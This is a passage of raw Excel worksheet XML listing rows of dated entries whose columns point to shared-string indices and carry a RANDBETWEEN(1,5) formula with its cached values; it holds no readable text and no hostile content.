        <v>43376.515115740738</v>
      </c>
      <c r="C8871" t="s">
        <v>10</v>
      </c>
      <c r="D8871" t="s">
        <v>89</v>
      </c>
      <c r="F8871">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8872" s="1">
        <v>43376.513252314813</v>
      </c>
      <c r="C8872" t="s">
        <v>10</v>
      </c>
      <c r="D8872" t="s">
        <v>89</v>
      </c>
      <c r="E8872" t="s">
        <v>7893</v>
      </c>
      <c r="F8872">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8873" s="1">
        <v>43376.512106481481</v>
      </c>
      <c r="C8873" t="s">
        <v>10</v>
      </c>
      <c r="D8873" t="s">
        <v>89</v>
      </c>
      <c r="E8873" t="s">
        <v>7893</v>
      </c>
      <c r="F8873">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8874" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8874" s="1">
        <v>43376.511238425926</v>
      </c>
      <c r="C8874" t="s">
        <v>10</v>
      </c>
      <c r="D8874" t="s">
        <v>17</v>
      </c>
      <c r="E8874" s="2" t="s">
        <v>7894</v>
      </c>
      <c r="F8874">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8875" s="1">
        <v>43376.507800925923</v>
      </c>
      <c r="C8875" t="s">
        <v>10</v>
      </c>
      <c r="D8875" t="s">
        <v>89</v>
      </c>
      <c r="E8875" t="s">
        <v>7893</v>
      </c>
      <c r="F8875">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8876" s="1">
        <v>43376.506956018522</v>
      </c>
      <c r="C8876" t="s">
        <v>10</v>
      </c>
      <c r="D8876" t="s">
        <v>89</v>
      </c>
      <c r="F8876">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8877" s="1">
        <v>43376.503240740742</v>
      </c>
      <c r="C8877" t="s">
        <v>10</v>
      </c>
      <c r="D8877" t="s">
        <v>52</v>
      </c>
      <c r="E8877" t="s">
        <v>7895</v>
      </c>
      <c r="F8877">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8878" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8878" s="1">
        <v>43376.481030092589</v>
      </c>
      <c r="C8878" t="s">
        <v>10</v>
      </c>
      <c r="D8878" t="s">
        <v>52</v>
      </c>
      <c r="E8878" s="2" t="s">
        <v>7896</v>
      </c>
      <c r="F8878">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8879" s="1">
        <v>43376.458587962959</v>
      </c>
      <c r="C8879" t="s">
        <v>197</v>
      </c>
      <c r="E8879" t="s">
        <v>7897</v>
      </c>
      <c r="F8879">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8880" s="1">
        <v>43376.446284722224</v>
      </c>
      <c r="C8880" t="s">
        <v>10</v>
      </c>
      <c r="D8880" t="s">
        <v>271</v>
      </c>
      <c r="E8880" t="s">
        <v>7898</v>
      </c>
      <c r="F8880">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8881" s="1">
        <v>43376.42291666667</v>
      </c>
      <c r="C8881" t="s">
        <v>10</v>
      </c>
      <c r="D8881" t="s">
        <v>89</v>
      </c>
      <c r="E8881" t="s">
        <v>7899</v>
      </c>
      <c r="F8881">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8882" s="1">
        <v>43376.420405092591</v>
      </c>
      <c r="C8882" t="s">
        <v>10</v>
      </c>
      <c r="D8882" t="s">
        <v>41</v>
      </c>
      <c r="E8882" t="s">
        <v>7900</v>
      </c>
      <c r="F8882">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8883" s="1">
        <v>43376.418310185189</v>
      </c>
      <c r="C8883" t="s">
        <v>10</v>
      </c>
      <c r="D8883" t="s">
        <v>263</v>
      </c>
      <c r="E8883" t="s">
        <v>7901</v>
      </c>
      <c r="F8883">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8884" s="1">
        <v>43376.395254629628</v>
      </c>
      <c r="C8884" t="s">
        <v>10</v>
      </c>
      <c r="D8884" t="s">
        <v>36</v>
      </c>
      <c r="E8884" t="s">
        <v>7902</v>
      </c>
      <c r="F8884">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8885" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8885" s="1">
        <v>43376.385081018518</v>
      </c>
      <c r="C8885" t="s">
        <v>124</v>
      </c>
      <c r="E8885" s="2" t="s">
        <v>7903</v>
      </c>
      <c r="F8885">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8886" s="1">
        <v>43376.322245370371</v>
      </c>
      <c r="C8886" t="s">
        <v>48</v>
      </c>
      <c r="E8886" t="s">
        <v>7904</v>
      </c>
      <c r="F8886">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8887" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8887" s="1">
        <v>43376.283425925925</v>
      </c>
      <c r="C8887" t="s">
        <v>454</v>
      </c>
      <c r="E8887" s="2" t="s">
        <v>7905</v>
      </c>
      <c r="F8887">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8888" s="1">
        <v>43376.282685185186</v>
      </c>
      <c r="C8888" t="s">
        <v>48</v>
      </c>
      <c r="E8888" t="s">
        <v>7906</v>
      </c>
      <c r="F8888">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8889" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8889" s="1">
        <v>43376.262962962966</v>
      </c>
      <c r="C8889" t="s">
        <v>454</v>
      </c>
      <c r="E8889" s="2" t="s">
        <v>7907</v>
      </c>
      <c r="F8889">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8890" s="1">
        <v>43376.248993055553</v>
      </c>
      <c r="C8890" t="s">
        <v>48</v>
      </c>
      <c r="E8890" t="s">
        <v>7908</v>
      </c>
      <c r="F8890">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8891" s="1">
        <v>43376.240914351853</v>
      </c>
      <c r="C8891" t="s">
        <v>65</v>
      </c>
      <c r="E8891" t="s">
        <v>7909</v>
      </c>
      <c r="F8891">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8892" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8892" s="1">
        <v>43376.231053240743</v>
      </c>
      <c r="C8892" t="s">
        <v>41</v>
      </c>
      <c r="E8892" s="2" t="s">
        <v>7910</v>
      </c>
      <c r="F8892">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8893" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8893" s="1">
        <v>43376.224479166667</v>
      </c>
      <c r="C8893" t="s">
        <v>65</v>
      </c>
      <c r="E8893" s="2" t="s">
        <v>7911</v>
      </c>
      <c r="F8893">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8894" s="1">
        <v>43376.223541666666</v>
      </c>
      <c r="C8894" t="s">
        <v>41</v>
      </c>
      <c r="E8894" t="s">
        <v>7912</v>
      </c>
      <c r="F8894">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8895" s="1">
        <v>43376.2190162037</v>
      </c>
      <c r="C8895" t="s">
        <v>60</v>
      </c>
      <c r="E8895" t="s">
        <v>7913</v>
      </c>
      <c r="F8895">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8896" s="1">
        <v>43376.217627314814</v>
      </c>
      <c r="C8896" t="s">
        <v>1408</v>
      </c>
      <c r="E8896" t="s">
        <v>7914</v>
      </c>
      <c r="F8896">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8897" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A8897" s="1">
        <v>43376.146620370368</v>
      </c>
      <c r="C8897" t="s">
        <v>10</v>
      </c>
      <c r="D8897" t="s">
        <v>6</v>
      </c>
      <c r="E8897" s="2" t="s">
        <v>6998</v>
      </c>
      <c r="F8897">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8898" s="1">
        <v>43376.130856481483</v>
      </c>
      <c r="C8898" t="s">
        <v>463</v>
      </c>
      <c r="E8898" t="s">
        <v>7915</v>
      </c>
      <c r="F8898">
        <f t="shared" ref="F8898:F8961" ca="1" si="139">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="8899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8899" s="1">
        <v>43376.13</v>
      </c>
      <c r="C8899" t="s">
        <v>139</v>
      </c>
      <c r="E8899" t="s">
        <v>7916</v>
      </c>
      <c r="F8899">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8900" s="1">
        <v>43376.125219907408</v>
      </c>
      <c r="C8900" t="s">
        <v>41</v>
      </c>
      <c r="E8900" t="s">
        <v>7917</v>
      </c>
      <c r="F8900">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8901" s="1">
        <v>43376.122025462966</v>
      </c>
      <c r="C8901" t="s">
        <v>253</v>
      </c>
      <c r="E8901" t="s">
        <v>7918</v>
      </c>
      <c r="F8901">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8902" s="1">
        <v>43376.092314814814</v>
      </c>
      <c r="C8902" t="s">
        <v>41</v>
      </c>
      <c r="E8902" t="s">
        <v>7919</v>
      </c>
      <c r="F8902">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8903" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A8903" s="1">
        <v>43376.039375</v>
      </c>
      <c r="C8903" t="s">
        <v>41</v>
      </c>
      <c r="E8903" s="2" t="s">
        <v>7920</v>
      </c>
      <c r="F8903">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8904" s="1">
        <v>43375.97761574074</v>
      </c>
      <c r="C8904" t="s">
        <v>73</v>
      </c>
      <c r="E8904" t="s">
        <v>7921</v>
      </c>
      <c r="F8904">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8905" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8905" s="1">
        <v>43375.910694444443</v>
      </c>
      <c r="C8905" t="s">
        <v>339</v>
      </c>
      <c r="E8905" s="2" t="s">
        <v>7922</v>
      </c>
      <c r="F8905">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8906" s="1">
        <v>43375.807685185187</v>
      </c>
      <c r="C8906" t="s">
        <v>10</v>
      </c>
      <c r="D8906" t="s">
        <v>6</v>
      </c>
      <c r="E8906" t="s">
        <v>7923</v>
      </c>
      <c r="F8906">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8907" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A8907" s="1">
        <v>43375.774745370371</v>
      </c>
      <c r="C8907" t="s">
        <v>10</v>
      </c>
      <c r="D8907" t="s">
        <v>6</v>
      </c>
      <c r="E8907" s="2" t="s">
        <v>7924</v>
      </c>
      <c r="F8907">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8908" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A8908" s="1">
        <v>43375.762314814812</v>
      </c>
      <c r="C8908" t="s">
        <v>10</v>
      </c>
      <c r="D8908" t="s">
        <v>6</v>
      </c>
      <c r="E8908" s="2" t="s">
        <v>7925</v>
      </c>
      <c r="F8908">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8909" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8909" s="1">
        <v>43375.726354166669</v>
      </c>
      <c r="C8909" t="s">
        <v>10</v>
      </c>
      <c r="D8909" t="s">
        <v>107</v>
      </c>
      <c r="E8909" s="2" t="s">
        <v>7926</v>
      </c>
      <c r="F8909">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8910" s="1">
        <v>43375.70275462963</v>
      </c>
      <c r="C8910" t="s">
        <v>10</v>
      </c>
      <c r="D8910" t="s">
        <v>94</v>
      </c>
      <c r="E8910" t="s">
        <v>7927</v>
      </c>
      <c r="F8910">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8911" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8911" s="1">
        <v>43375.669988425929</v>
      </c>
      <c r="C8911" t="s">
        <v>43</v>
      </c>
      <c r="E8911" s="2" t="s">
        <v>7928</v>
      </c>
      <c r="F8911">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8912" s="1">
        <v>43375.632696759261</v>
      </c>
      <c r="C8912" t="s">
        <v>10</v>
      </c>
      <c r="D8912" t="s">
        <v>263</v>
      </c>
      <c r="E8912" t="s">
        <v>7929</v>
      </c>
      <c r="F8912">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8913" s="1">
        <v>43375.630277777775</v>
      </c>
      <c r="C8913" t="s">
        <v>10</v>
      </c>
      <c r="D8913" t="s">
        <v>89</v>
      </c>
      <c r="E8913" t="s">
        <v>7930</v>
      </c>
      <c r="F8913">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8914" s="1">
        <v>43375.620196759257</v>
      </c>
      <c r="C8914" t="s">
        <v>10</v>
      </c>
      <c r="D8914" t="s">
        <v>374</v>
      </c>
      <c r="E8914" t="s">
        <v>7931</v>
      </c>
      <c r="F8914">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8915" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8915" s="1">
        <v>43375.615127314813</v>
      </c>
      <c r="C8915" t="s">
        <v>6</v>
      </c>
      <c r="D8915" t="s">
        <v>25</v>
      </c>
      <c r="E8915" s="2" t="s">
        <v>7932</v>
      </c>
      <c r="F8915">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8916" s="1">
        <v>43375.61204861111</v>
      </c>
      <c r="C8916" t="s">
        <v>6</v>
      </c>
      <c r="D8916" t="s">
        <v>821</v>
      </c>
      <c r="E8916" t="s">
        <v>7933</v>
      </c>
      <c r="F8916">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8917" s="1">
        <v>43375.600162037037</v>
      </c>
      <c r="C8917" t="s">
        <v>6</v>
      </c>
      <c r="D8917" t="s">
        <v>194</v>
      </c>
      <c r="E8917" t="s">
        <v>7934</v>
      </c>
      <c r="F8917">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8918" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8918" s="1">
        <v>43375.590254629627</v>
      </c>
      <c r="C8918" t="s">
        <v>107</v>
      </c>
      <c r="E8918" s="2" t="s">
        <v>7935</v>
      </c>
      <c r="F8918">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8919" s="1">
        <v>43375.587557870371</v>
      </c>
      <c r="C8919" t="s">
        <v>10</v>
      </c>
      <c r="D8919" t="s">
        <v>46</v>
      </c>
      <c r="E8919" t="s">
        <v>7936</v>
      </c>
      <c r="F8919">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8920" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A8920" s="1">
        <v>43375.579722222225</v>
      </c>
      <c r="C8920" t="s">
        <v>6</v>
      </c>
      <c r="D8920" t="s">
        <v>194</v>
      </c>
      <c r="E8920" s="2" t="s">
        <v>7937</v>
      </c>
      <c r="F8920">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8921" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A8921" s="1">
        <v>43375.578541666669</v>
      </c>
      <c r="C8921" t="s">
        <v>6</v>
      </c>
      <c r="D8921" t="s">
        <v>194</v>
      </c>
      <c r="E8921" s="2" t="s">
        <v>7938</v>
      </c>
      <c r="F8921">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8922" s="1">
        <v>43375.572812500002</v>
      </c>
      <c r="C8922" t="s">
        <v>6</v>
      </c>
      <c r="D8922" t="s">
        <v>194</v>
      </c>
      <c r="E8922" t="s">
        <v>7939</v>
      </c>
      <c r="F8922">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8923" s="1">
        <v>43375.562997685185</v>
      </c>
      <c r="C8923" t="s">
        <v>10</v>
      </c>
      <c r="D8923" t="s">
        <v>6</v>
      </c>
      <c r="E8923" t="s">
        <v>7940</v>
      </c>
      <c r="F8923">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8924" s="1">
        <v>43375.539733796293</v>
      </c>
      <c r="C8924" t="s">
        <v>10</v>
      </c>
      <c r="D8924" t="s">
        <v>36</v>
      </c>
      <c r="E8924" t="s">
        <v>7941</v>
      </c>
      <c r="F8924">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8925" s="1">
        <v>43375.538194444445</v>
      </c>
      <c r="C8925" t="s">
        <v>10</v>
      </c>
      <c r="D8925" t="s">
        <v>52</v>
      </c>
      <c r="E8925" t="s">
        <v>7942</v>
      </c>
      <c r="F8925">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8926" s="1">
        <v>43375.535601851851</v>
      </c>
      <c r="C8926" t="s">
        <v>10</v>
      </c>
      <c r="D8926" t="s">
        <v>6</v>
      </c>
      <c r="E8926" t="s">
        <v>7943</v>
      </c>
      <c r="F8926">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8927" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8927" s="1">
        <v>43375.528761574074</v>
      </c>
      <c r="C8927" t="s">
        <v>290</v>
      </c>
      <c r="E8927" s="2" t="s">
        <v>7944</v>
      </c>
      <c r="F8927">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8928" s="1">
        <v>43375.517523148148</v>
      </c>
      <c r="C8928" t="s">
        <v>10</v>
      </c>
      <c r="D8928" t="s">
        <v>86</v>
      </c>
      <c r="E8928" t="s">
        <v>7945</v>
      </c>
      <c r="F8928">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8929" s="1">
        <v>43375.516284722224</v>
      </c>
      <c r="C8929" t="s">
        <v>865</v>
      </c>
      <c r="E8929" t="s">
        <v>7946</v>
      </c>
      <c r="F8929">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8930" s="1">
        <v>43375.515706018516</v>
      </c>
      <c r="C8930" t="s">
        <v>10</v>
      </c>
      <c r="D8930" t="s">
        <v>46</v>
      </c>
      <c r="E8930" t="s">
        <v>7947</v>
      </c>
      <c r="F8930">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8931" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8931" s="1">
        <v>43375.502928240741</v>
      </c>
      <c r="C8931" t="s">
        <v>10</v>
      </c>
      <c r="D8931" t="s">
        <v>6</v>
      </c>
      <c r="E8931" s="2" t="s">
        <v>7948</v>
      </c>
      <c r="F8931">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8932" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8932" s="1">
        <v>43375.502905092595</v>
      </c>
      <c r="C8932" t="s">
        <v>10</v>
      </c>
      <c r="D8932" t="s">
        <v>6</v>
      </c>
      <c r="E8932" s="2" t="s">
        <v>7948</v>
      </c>
      <c r="F8932">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8933" s="1">
        <v>43375.497731481482</v>
      </c>
      <c r="C8933" t="s">
        <v>10</v>
      </c>
      <c r="D8933" t="s">
        <v>17</v>
      </c>
      <c r="E8933" t="s">
        <v>7949</v>
      </c>
      <c r="F8933">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8934" s="1">
        <v>43375.496145833335</v>
      </c>
      <c r="C8934" t="s">
        <v>10</v>
      </c>
      <c r="D8934" t="s">
        <v>36</v>
      </c>
      <c r="E8934" t="s">
        <v>7950</v>
      </c>
      <c r="F8934">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8935" s="1">
        <v>43375.488113425927</v>
      </c>
      <c r="C8935" t="s">
        <v>10</v>
      </c>
      <c r="D8935" t="s">
        <v>36</v>
      </c>
      <c r="E8935" t="s">
        <v>7951</v>
      </c>
      <c r="F8935">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8936" s="1">
        <v>43375.473981481482</v>
      </c>
      <c r="C8936" t="s">
        <v>67</v>
      </c>
      <c r="E8936" t="s">
        <v>7952</v>
      </c>
      <c r="F8936">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8937" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8937" s="1">
        <v>43375.458738425928</v>
      </c>
      <c r="C8937" t="s">
        <v>10</v>
      </c>
      <c r="D8937" t="s">
        <v>80</v>
      </c>
      <c r="E8937" s="2" t="s">
        <v>7953</v>
      </c>
      <c r="F8937">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8938" s="1">
        <v>43375.453530092593</v>
      </c>
      <c r="C8938" t="s">
        <v>50</v>
      </c>
      <c r="D8938" t="s">
        <v>312</v>
      </c>
      <c r="E8938" t="s">
        <v>7954</v>
      </c>
      <c r="F8938">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8939" s="1">
        <v>43375.446793981479</v>
      </c>
      <c r="C8939" t="s">
        <v>10</v>
      </c>
      <c r="D8939" t="s">
        <v>6</v>
      </c>
      <c r="E8939" t="s">
        <v>7955</v>
      </c>
      <c r="F8939">
        <f t="shared" ca="1" si="139"/>
        <v>1</v>
      </c>
    </row>
    <row r="8940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8940" s="1">
        <v>43375.446030092593</v>
      </c>
      <c r="C8940" t="s">
        <v>10</v>
      </c>
      <c r="D8940" t="s">
        <v>41</v>
      </c>
      <c r="E8940" t="s">
        <v>7956</v>
      </c>
      <c r="F8940">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8941" s="1">
        <v>43375.429097222222</v>
      </c>
      <c r="C8941" t="s">
        <v>10</v>
      </c>
      <c r="D8941" t="s">
        <v>1091</v>
      </c>
      <c r="E8941" t="s">
        <v>7957</v>
      </c>
      <c r="F8941">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8942" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A8942" s="1">
        <v>43375.422268518516</v>
      </c>
      <c r="C8942" t="s">
        <v>10</v>
      </c>
      <c r="D8942" t="s">
        <v>6</v>
      </c>
      <c r="E8942" s="2" t="s">
        <v>7958</v>
      </c>
      <c r="F8942">
        <f t="shared" ca="1" si="139"/>
        <v>3</v>
      </c>
    </row>
    <row r="8943" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8943" s="1">
        <v>43375.414675925924</v>
      </c>
      <c r="C8943" t="s">
        <v>48</v>
      </c>
      <c r="E8943" s="2" t="s">
        <v>7959</v>
      </c>
      <c r="F8943">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8944" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8944" s="1">
        <v>43375.402083333334</v>
      </c>
      <c r="C8944" t="s">
        <v>17</v>
      </c>
      <c r="E8944" s="2" t="s">
        <v>7960</v>
      </c>
      <c r="F8944">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8945" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8945" s="1">
        <v>43375.399108796293</v>
      </c>
      <c r="C8945" t="s">
        <v>6</v>
      </c>
      <c r="D8945" t="s">
        <v>25</v>
      </c>
      <c r="E8945" t="s">
        <v>7961</v>
      </c>
      <c r="F8945">
        <f t="shared" ca="1" si="139"/>
        <v>5</v>
      </c>
    </row>
    <row r="8946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8946" s="1">
        <v>43375.357731481483</v>
      </c>
      <c r="C8946" t="s">
        <v>97</v>
      </c>
      <c r="E8946" t="s">
        <v>7962</v>
      </c>
      <c r="F8946">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8947" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8947" s="1">
        <v>43375.32304398148</v>
      </c>
      <c r="C8947" t="s">
        <v>124</v>
      </c>
      <c r="E8947" s="2" t="s">
        <v>7963</v>
      </c>
      <c r="F8947">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
    <row r="8948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8948" s="1">
        <v>43375.315671296295</v>
      </c>
      <c r="C8948" t="s">
        <v>10</v>
      </c>
      <c r="D8948" t="s">
        <v>290</v>
      </c>
      <c r="F8948">
        <f t="shared" ca="1" si="139"/>
        <v>2</v>
      </c>
    </row>
    <row r="8949" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8949" s="1">
        <v>43375.293761574074</v>
      </c>
      <c r="C8949" t="s">
        <v>65</v>
      </c>
      <c r="E8949" s="2" t="s">
        <v>7964</v>
      </c>
      <c r="F8949">
        <f t="shared" ca="1" si="139"/>
        <v>4</v>
      </c>
    </row>
